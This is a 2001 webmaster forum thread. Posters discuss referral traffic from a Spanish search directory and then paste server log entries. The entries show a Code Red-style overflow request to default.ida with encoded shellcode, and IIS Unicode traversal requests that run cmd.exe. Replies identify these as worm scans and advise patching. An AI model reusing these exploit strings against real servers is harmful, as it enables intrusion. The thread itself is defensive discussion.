hi there.
i has just looking at my server logs and i have found a site linking to me and sending me quite a few users on a daily basis. the site apears to be in french and there is a direct link to my search. take a lok at this.they have even placed me at the top of the page.
http://buscadores.buscopio.com/scripts/proel/buscopio/lstbsc.asp?cat=Keneral&catP=Inna&prn=20

does anyone have any idea what this is all about???


clickforchoice.com a new up and coming web directory and portal

Lucky i think. Easy to guess you are on top by alphabetical order and site is full of links to many search engines. It could bring you lot of traffic...Nothig wrong

www.midi-studio.com

I also receive plenty of visitors from their site which is Spanish by the way...

Thomas
http://links.japanref.com

well has anyone ever seen this in their access logs?
63.69.203.46 - - [15/Jul/2001:15:52:51 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-"

or:

64.77.12.122 - - [18/Jul/2001:11:41:33 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 226 "-" "Unknown"

or:

64.77.12.122 - - [18/Jul/2001:11:41:51 -0500] "GET /msadc/..%e0€%af../..%e0€%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 226 "-" "Unknown"

(there are about a dozen other variations)
Eache of these are in my logs at least 20 times. My host said they've been getting some attempted denial of service attacks but I'm not sure if this is related.

Happy coding,

--Drew
http://www.camelsoup.com
ftp://ftp.camelsoup.com

Yep, found the same thing today in my error logs. Wondered about that "default.ida" file...



Thomas
http://links.japanref.com

I believe that's a worm or some person scanning the internet for an IIS vulnerability on the IIS Server. If your not using IIS you don't have problem. If you are you should apply the patch for the vulnerability immediately.

Later,
Paul

http://www.fullmoonshining.com for Pearl Jam Fans

Yes...worms were sent yesterday, and 200,000 web servers worldwide were infected, including our production server at work.

see ya.

Regards,

Eliot Lee
http://anthrotech.com/

hi again.
The spannish site is sending me some good traffic but it is also causing quite a lot of non english submissions.

clickforchoice.com a new up and coming web directory and portal

So what's a worm?? I also saw this in my reports:


User: c55480-d.brstl1.ct.home.com (24.180.57.112)
Tracked at page: users/file/default.ida

May help:

http://google.yahoo.com/...rm&hc=0&hs=0

Installations:http://www.wiredon.net/gt/

For more information regarding worm and virus attacks, you should visit the following web sites frequently (although if you are on a virtual shared server, there is not much you can do to repair problems, however, advice is provided on how to better secure your web applications)....

http://www.incidents.org/

http://www.cert.org/

http://www.sans.org/

Regards,

Eliot Lee
http://anthrotech.com/

Eeek! Yeah, I'm on a Unix server but I have had some significant downtime this past week. Some of my host's servers are NT so I guess I may have been indirectly effected.

Happy coding,

--Drew
http://www.camelsoup.com
ftp://ftp.camelsoup.com